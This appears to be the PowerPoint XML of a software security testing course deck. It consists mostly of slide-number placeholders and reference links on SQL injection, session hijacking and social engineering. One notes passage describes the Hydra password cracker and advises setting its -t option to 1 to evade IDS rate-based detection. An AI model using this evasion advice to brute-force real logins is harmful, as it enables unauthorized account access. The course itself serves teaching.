      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35053220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mtClean="0"/>
              <a:t>SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14650341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mtClean="0"/>
              <a:t>SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41681764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mtClean="0"/>
              <a:t>SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39398297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mtClean="0"/>
              <a:t>SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1343665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Advanced Software Testing Vol. 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17706365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mtClean="0"/>
              <a:t>SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19106540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SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8937626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http://www.slideshare.net/amiable_indian/advanced-topics-on-sql-injection-protection</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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11377728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http://www.scribd.com/doc/54228526/7/Password-Attacks</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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18634479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this tool supports: AFP, Cisco AAA, Cisco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Rexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Rlogin, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, SAP/R3, SIP, SMB, SMTP, SMTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Enum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, SNMP, SOCKS5, SSH (v1 and v2), Subversion, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Teamspeak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (TS2), Telnet, VMware-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, VNC and XMPP. For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 digest etc. are supported.</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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35405239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IPS   (Intrusion   Prevention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System)   is   a   must   have   in   a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>corporate   network,   nowadays</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>such kind of device always come</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>with   predefined   signatures   to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>detect password cracking attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However, they have a weak point,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>they are based on a defined rate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For   example   if   there   are   10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>authentication failed in 5 seconds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>from   the   same   source   IP   just</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>block  or  quarantine the  attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for x seconds.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For   this   purpose   Hydra   comes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>with  some features to  plan  how</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the   attack   is   conducted.   The   ­t</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>option   can   be   used   to   set   the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>number   of   concurrent   tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(default is 16). Setting it to 1 and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>you will  stay  under the  radar  of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>any IDS.</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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29715107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FlyingBit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Passwored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Generator: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.snapfiles.com/screenshots/fbpwgen.htm</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82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17661905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http://en.kioskea.net/contents/attaques/manipulation-url.php3</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88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16651603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http://www.slideshare.net/leminhvuong/module-6-session-hijacking</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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27169692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http://www.slideshare.net/leminhvuong/module-6-session-hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.slideshare.net/amansyal/session-hijacking-by-rahul-tyagi</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101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3292486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Advanced Software Testing Vol. 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11935155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http://www.slideshare.net/leminhvuong/module-6-session-hijacking</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102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13787866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http://www.slideshare.net/leminhvuong/module-6-session-hijacking</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103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4120794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http://www.slideshare.net/leminhvuong/module-6-session-hijacking</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104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8684162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http://www.slideshare.net/leminhvuong/module-6-session-hijacking</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105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35829781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http://www.slideshare.net/leminhvuong/module-6-session-hijacking</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107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25700232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http://www.slideshare.net/washal/social-engineeringcase-study</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://en.wikipedia.org/wiki/Social_engineering_(security)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.slideshare.net/abercius24/social-engineering-e</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109</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42831698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http://www.slideshare.net/abercius24/social-engineering-e</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110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37010337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http://www.slideshare.net/abercius24/social-engineering-e</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111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40246215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http://www.slideshare.net/abercius24/social-engineering-e</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112</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25192701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http://www.slideshare.net/abercius24/social-engineering-e</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113</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="787630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Security Testing Is Hard,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Martin R. Stytz, James A. Whittaker</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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10967377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http://www.slideshare.net/abercius24/social-engineering-e</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114</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28909964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http://www.slideshare.net/abercius24/social-engineering-e</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115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38360332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http://www.slideshare.net/abercius24/social-engineering-e</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116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35258941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http://www.slideshare.net/abercius24/social-engineering-e</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117</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31433725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http://www.slideshare.net/abercius24/social-engineering-e</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118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5829408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http://www.slideshare.net/niharsarangi/cryptography</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120</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11570879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http://www.slideshare.net/niharsarangi/cryptography</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121</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40928113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http://www.slideshare.net/niharsarangi/cryptography</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122</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399914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Software Security Testing, Gary McGraw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>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Software Testing,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Ron Patton</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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="925988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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1800472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Software Security Testing, Gary McGraw (article)</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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86944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SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3267078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www.telerik.com/"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2"/>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extLst>
